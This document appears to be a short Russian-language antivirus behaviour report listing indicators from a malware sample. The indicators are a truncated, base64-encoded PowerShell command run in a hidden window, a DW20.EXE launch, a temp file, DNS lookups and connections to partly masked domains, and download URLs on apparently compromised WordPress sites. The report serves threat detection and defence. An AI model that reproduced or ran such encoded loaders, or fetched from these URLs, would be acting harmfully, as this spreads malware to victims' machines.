Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAGkAcgB4AGsAdABlAGQAawB4AHEAcgB2AD0AJwBWAHEAcQBzAGgAYwBmAG8AbABkAGgAaQAnADsAJABGAHoAcABxAGMAYwBvAHIAdABmACAAPQAgACcANAAxADAAJwA7ACQAUwB0AGwAagB3AHgAZQBhAGYAZgBqAHoAegA9ACcAWAB2AHQAaABzAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1382246.cvr
- 'ga####tnership.com':80
- 'ba###afe.com':80
- 'ba###afe.com':443
- 'wi####d-juettner.de':443
- 'ap####te-post.de':443
- http://ga####tnership.com/wp-admin/d0i-2eeblx-9930/
- http://ba###afe.com/wp-content/mhkrxe-d2h032l6-5086928236/
- 'ba###afe.com':443
- 'wi####d-juettner.de':443
- 'ap####te-post.de':443
- DNS ASK ga####tnership.com
- DNS ASK li###ensci.com
- DNS ASK ba###afe.com
- DNS ASK wi####d-juettner.de
- DNS ASK ap####te-post.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAGkAcgB4AGsAdABlAGQAawB4AHEAcgB2AD0AJwBWAHEAcQBzAGgAYwBmAG8AbABkAGgAaQAnADsAJABGAHoAcABxAGMAYwBvAHIAdABmACAAPQAgACcANAAxADAAJwA7ACQAUwB0AGwAagB3AHgAZQBhAGYAZgBqAHoAegA9ACcAWAB2AHQAaABzAG...' (со скрытым окном)